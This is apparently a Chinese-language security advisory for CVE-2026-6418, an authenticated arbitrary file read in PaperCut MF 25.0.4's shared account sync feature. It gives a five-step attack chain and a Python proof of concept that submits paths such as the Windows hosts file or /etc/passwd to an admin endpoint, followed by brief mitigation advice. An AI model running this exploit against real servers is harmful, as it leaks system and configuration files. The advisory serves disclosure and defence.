CVE-2026-6418 CVSS 4.9 中危

CVE-2026-6418 PaperCut MF 任意文件读取漏洞

披露日期: 2026-05-05

来源: eb41dac7-0af8-4f84-9f6d-0272772514f4

漏洞信息

漏洞编号

CVE-2026-6418

漏洞类型

任意文件读取

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PaperCut MF

漏洞概述

PaperCut MF 版本 25.0.4 的共享账户同步组件存在安全漏洞。由于缺乏适当的路径验证，经过身份验证的管理员用户可指定本地文件系统上的任意文件路径。当触发同步时，应用程序会解析并暴露指定文件的内容，可能导致敏感系统信息或配置细节泄露。

技术细节

该漏洞源于 PaperCut MF 中共享账户同步组件对输入的源路径缺乏有效的验证和清洗。攻击者需拥有管理员权限，通过配置接口将同步源路径设置为恶意路径（如 /etc/passwd 或配置文件）。应用程序在执行同步逻辑时，未对路径进行白名单检查或规范化处理，直接读取了该路径下的文件内容，并将其回显在账户管理界面中。这一过程允许攻击者枚举目录结构并窃取敏感文本数据，利用了服务账户的文件读取权限。

攻击链分析

STEP 1

攻击者获取目标 PaperCut MF 系统的管理员账户凭证。

STEP 2

登录系统并导航至“共享账户同步”配置页面。

STEP 3

在账户数据源路径输入框中，输入恶意的文件路径（例如：C:/Windows/win.ini）。

STEP 4

触发同步或测试连接操作，应用程序读取指定文件。

STEP 5

应用程序在界面中返回文件内容，攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit for CVE-2026-6418
# Target: PaperCut MF 25.0.4
# Precondition: Valid Admin Session

target_host = "http://target-papercut-server:9191"
session_cookie = "JSESSIONID=ADMIN_SESSION_ID_HERE"

# The vulnerable endpoint for Shared Account Synchronization
url = f"{target_host}/app?service=direct/1/AccountSync/manage"

# Malicious payload: Reading a sensitive file
# Example: Windows host file or Linux passwd file
malicious_path = "C:\\Windows\\System32\\drivers\\etc\\hosts" 

headers = {
    "Cookie": session_cookie,
    "Content-Type": "application/x-www-form-urlencoded"
}

# Data payload simulating the configuration update
data = {
    "formIds": "path,action",
    "path": malicious_path,
    "action": "syncAndTest"
}

try:
    response = requests.post(url, headers=headers, data=data)
    if response.status_code == 200:
        print("Request sent successfully.")
        # Check if sensitive content is reflected in the response
        if "# Copyright (c)" in response.text or "127.0.0.1" in response.text:
            print("[+] Potential file content found in response.")
        else:
            print("[-] File content not directly visible or path invalid.")
except Exception as e:
    print(f"Error: {e}")

影响范围

PaperCut MF 25.0.4

防御指南

临时缓解措施

如果暂时无法升级，建议禁用共享账户同步功能以降低风险。同时，应严格审查管理员权限分配，并监控日志中是否存在异常的文件访问或同步请求路径。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表